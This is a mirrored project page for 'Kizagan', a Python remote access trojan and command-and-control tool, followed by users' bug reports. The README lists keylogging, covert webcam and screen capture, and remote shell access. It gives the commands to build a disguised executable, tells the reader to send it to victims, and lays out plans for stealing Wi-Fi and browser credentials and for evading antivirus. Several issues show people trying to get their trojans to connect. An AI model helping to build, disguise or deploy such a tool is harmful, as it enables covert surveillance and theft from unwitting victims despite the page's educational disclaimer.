Giter Club home page Giter Club logo

kizagan's Introduction

KIZAGAN

Kizagan is a RAT,C2 tool built with python.Kizagan can build executables and control infected machines.

a

Features

  • Basic file/directory commands.(rename, delete, create etc.)

  • Download/Upload files.

  • Execute shell/terminal commands directly.

  • Take victim snap screenshot.

  • Watch live screen stream.

  • Take victim camera snapshot.

  • Watch live victim camera.

  • Advanced keylogger.

  • Merge executable with an arbitrary file.

FEAUTURES TO DO

  • Encrypted connection

  • Persistence

  • Wifi names and passwords

  • Browser datas

  • Applications to make FUD

  • GUI

  • Access microphone

SETUP

Clone the project or download the zip file and extract it.

git clone https://github.com/st4inl3s5/kizagan

To make setup, use the following command :

pip install -r requirements.txt

USAGE

Build an executable file with following command :

python3 kizagan.py build -ip <control_server_ip> -p <control_server_port> -i <your_icon_file> -m <your_merge_file> -n <executable_name>

1

2

3

4

Send the executable file to victims.

Start the control server with following command :

python3 kizagan.py control -ip <control_server_ip> -p <control_server_port>

5

6

Wait for the victims to open your executable.When a victims open your executable, victims will appear in terminal :

7

Press CTRL+C to interact with a victim :

8

Type 'help' to view help menu.

9

MOTIVATION

"Buy Me A Coffee"

My motivation to develop kizagan, your donations, improve my cyber and software knowledge.

DISCLAIMER

This tool developed for educational and red team purposes.Don't use this tool for illegal purposes.I am not responsible for illegal actions.

So the kizagan under development, it can have bugs.Please report me the bugs you find.

CONTACT

https://www.instagram.com/arduinocum.py/

https://t.me/+5XoMhXv4SghhYmE0

kizagan's People

Contributors

st4inl3s5 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar

kizagan's Issues

Wrong IP or port number.Please try again. (Troyan is setup correctly)

I used the IP of my device (which is connected through Ethernet) and the port corresponding to the IP, all the procedures have gone as expected except for wanting to make a connection with the infected IP, with the reason "Wrong IP or port number.Please try again."

Is there anything else I should take into account to be able to verify that the entire procedure went correctly?

builder.py

when ever i try and run the builder.py it spits this code at me
"FileNotFoundError: [WinError 2] The system cannot find the file specified"
idk what to do
image_2024-02-28_190439312

wont build client

idk why it doesnt want to work this is the the 400th time it doesntwant to work "HELP
image_2024-03-05_145843611
"

ImportError: numpy.core.multiarray failed to import

"Traceback (most recent call last):
File "client.py", line 14, in
File "PyInstaller\loader\pyimod03_importers.py", line 476, in exec_module
File "cv2_init_.py", line 5, in
ImportError: numpy.core.multiarray failed to import"
I got this error when building your python command, please help me:

Error

what does this mean and how do i fix it?
PermissionError: [WinError 10013] An attempt was made to access a socket in a way forbidden by its access permissions

Traceback (most recent call last):

Traceback (most recent call last):
File "/usr/bin/pyinstaller", line 11, in
load_entry_point('PyInstaller==3.5+498e6ee058', 'console_scripts', 'pyinstaller')()
File "/usr/lib/python3/dist-packages/PyInstaller/main.py", line 111, in run
run_build(pyi_config, spec_file, **vars(args))
File "/usr/lib/python3/dist-packages/PyInstaller/main.py", line 63, in run_build
PyInstaller.building.build_main.main(pyi_config, spec_file, **kwargs)
File "/usr/lib/python3/dist-packages/PyInstaller/building/build_main.py", line 844, in main
build(specfile, kw.get('distpath'), kw.get('workpath'), kw.get('clean_build'))
File "/usr/lib/python3/dist-packages/PyInstaller/building/build_main.py", line 791, in build
exec(code, spec_namespace)
File "/home/whoami/kizagan/kizaganEN.spec", line 6, in
a = Analysis(['kizaganEN.py'],
^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/PyInstaller/building/build_main.py", line 243, in init
self.postinit()
File "/usr/lib/python3/dist-packages/PyInstaller/building/datastruct.py", line 158, in postinit
self.assemble()
File "/usr/lib/python3/dist-packages/PyInstaller/building/build_main.py", line 348, in assemble
self.graph = initialize_modgraph(
^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/PyInstaller/depend/analysis.py", line 613, in initialize_modgraph
graph.import_hook(m)
File "/usr/lib/python3/dist-packages/PyInstaller/lib/modulegraph/modulegraph.py", line 1473, in import_hook
target_package, target_module_partname = self._find_head_package(
^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/PyInstaller/lib/modulegraph/modulegraph.py", line 1657, in _find_head_package
raise ImportError("No module named " + target_package_name)
ImportError: No module named _bootlocale

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.